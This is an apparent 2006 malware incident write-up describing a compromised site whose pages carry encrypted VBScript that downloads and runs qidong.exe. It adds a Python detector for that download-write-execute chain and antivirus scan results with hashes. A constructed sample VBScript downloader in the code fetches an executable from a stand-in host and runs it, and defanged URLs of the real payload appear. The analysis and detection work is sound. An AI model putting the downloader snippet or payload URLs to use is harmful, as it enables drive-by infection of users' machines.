Original by endurer
2006-09-06 2nd edition
2006-09-02 1st edition
The home page of the site hxxp://www.94l***m.com/ opens one of the following pages depending on the value of a cookie:
/------------
hxxp://www.dudu**w.com/web/dudu*****13.htm
------------/
or
/------------
hxxp://www.dud**uw.com/web/dudu*****12.htm
------------/
dudu*****13.htm and dudu*****12.htm contain encrypted VBScript code. The script uses Microsoft.XMLHTTP and Scripting.FileSystemObject to download the file hxxp://qidong.virussky.com/qidong.exe, saves it in the IE temporary files folder as an85.com, and runs it with the ShellExecute method of the Shell.Application object.
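As an added example (not code from the original post), the following Python script shows how a defender could flag pages like dudu*****13.htm: it undoes simple string-concatenation obfuscation, then checks for the three stages described above (Microsoft.XMLHTTP download, Scripting.FileSystemObject write to disk, Shell.Application execution) and for the `#@~^` marker of a Script Encoder-encoded script. The sample HTML is constructed; the alternative ProgIDs MSXML2.XMLHTTP, ADODB.Stream and WScript.Shell are my additions beyond what the post mentions.

```python
import re

# Constructed sample shaped like the downloader the post describes, with the
# ProgIDs split by string concatenation (a common way to evade simple matching).
SAMPLE_HTML = '''<html><script language="VBScript">
Set x = CreateObject("Micro" & "soft.XMLHTTP")
x.Open "GET", "hxxp://example.invalid/qidong.exe", False
x.Send
Set fso = CreateObject("Scripting.File" & "SystemObject")
Set sh = CreateObject("Shell.Application")
sh.ShellExecute "an85.com"
</script></html>'''

# Stages of the download-and-run chain and the ProgIDs that implement each one.
# The first entry of each tuple is from the post; the rest are related ProgIDs
# I added (assumption: same role in other downloader variants).
DOWNLOADER_CHAIN = {
    "download": ("microsoft.xmlhttp", "msxml2.xmlhttp"),
    "write_to_disk": ("scripting.filesystemobject", "adodb.stream"),
    "execute": ("shell.application", "wscript.shell"),
}
# Windows Script Encoder output starts with "#@~^"; the language attribute
# is another hint that the script body cannot be read as-is.
ENCODED_SCRIPT_MARKERS = ("#@~^", "vbscript.encode", "jscript.encode")


def normalize_script(text):
    """Join "a" & "b" string pieces and lower-case so split ProgIDs match."""
    joined = re.sub(r'"\s*&\s*"', "", text)
    return joined.lower()


def analyze(text):
    """Return which chain stages were seen, whether the script is encoded, and a verdict."""
    norm = normalize_script(text)
    stages = {stage: any(k in norm for k in keys)
              for stage, keys in DOWNLOADER_CHAIN.items()}
    encoded = any(m in norm for m in ENCODED_SCRIPT_MARKERS)
    if all(stages.values()):
        verdict = "downloader-chain"      # full download -> write -> execute chain
    elif encoded:
        verdict = "encoded-script"        # cannot inspect without decoding first
    else:
        verdict = "no-match"
    return {"stages": stages, "encoded": encoded, "verdict": verdict}


if __name__ == "__main__":
    print(analyze(SAMPLE_HTML))
```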
| Field | Value |
|---|---|
| File | qidong.exe |
| Status | INFECTED/MALWARE |
| MD5 | f932ee7f241695d5ee6527a231795468 |
| Packers detected | UPX |

Scanner results:

| Scanner | Result |
|---|---|
| AntiVir | Found Heuristic/Malware (probable variant) |
| ArcaVir | Found nothing |
| Avast | Found nothing |
| AVG Antivirus | Found nothing |
| BitDefender | Found Generic.Malware.BE!g.66E35076 |
| ClamAV | Found nothing |
| Dr.Web | Found Trojan.Update |
| F-Prot Antivirus | Found nothing |
| Fortinet | Found nothing |
| Kaspersky Anti-Virus | Found Trojan-Downloader.Win32.Agent.aqr |
| NOD32 | Found probably unknown NewHeur_PE (probable variant) |
| Norman Virus Control | Found nothing |
| UNA | Found nothing |
| VirusBuster | Found nothing |
| VBA32 | Found nothing |
| Antivirus | Version | Update | Result |
|---|---|---|---|
| AntiVir | 7.1.1.11 | 09.06.2006 | TR/Dldr.Agent.aqr.15 |
| Authentium | 4.93.8 | 09.06.2006 | no virus found |
| Avast | 4.7.844.0 | 09.06.2006 | no virus found |
| AVG | 386 | 09.06.2006 | Downloader.Agent.FGL |
| BitDefender | 7.2 | 09.06.2006 | Generic.Malware.BE!g.66E35076 |
| CAT-QuickHeal | 8.00 | 09.05.2006 | no virus found |
| ClamAV | devel-20060426 | 09.06.2006 | no virus found |
| DrWeb | 4.33 | 09.06.2006 | Trojan.Update |
| eTrust-InoculateIT | 23.72.117 | 09.05.2006 | no virus found |
| eTrust-Vet | 30.3.3064 | 09.06.2006 | no virus found |
| Ewido | 4.0 | 09.05.2006 | Downloader.Agent.aqr |
| Fortinet | 2.77.0.0 | 09.06.2006 | no virus found |
| F-Prot | 3.16f | 09.06.2006 | no virus found |
| F-Prot4 | 4.2.1.29 | 09.06.2006 | no virus found |
| Ikarus | 0.2.65.0 | 09.06.2006 | no virus found |
| Kaspersky | 4.0.2.24 | 09.06.2006 | Trojan-Downloader.Win32.Agent.aqr |
| McAfee | 4845 | 09.05.2006 | Downloader-AWE |
| Microsoft | 1.1560 | 09.06.2006 | no virus found |
| NOD32v2 | 1.1741 | 09.06.2006 | probably unknown NewHeur_PE virus |
| Norman | 5.90.23 | 09.06.2006 | no virus found |
| Panda | 9.0.0.4 | 09.05.2006 | Trj/Delf.ABZ |
| Sophos | 4.09.0 | 09.06.2006 | no virus found |
| Symantec | 8.0 | 09.06.2006 | no virus found |
| TheHacker | 5.9.8.205 | 09.06.2006 | Posible_Worm322 |
| UNA | 1.83 | 09.06.2006 | no virus found |
| VBA32 | 3.11.1 | 09.05.2006 | Trojan-Downloader.Win32.Agent.aqr |
| VirusBuster | 4.3.7:9 | 09.06.2006 | no virus found |
Additional information:

| Field | Value |
|---|---|
| File size | 31744 bytes |
| MD5 | f932ee7f241695d5ee6527a231795468 |
| SHA1 | 6414ec3d64ede47a4eec4cd07166380b223431da |
| Packers | UPX, embedded |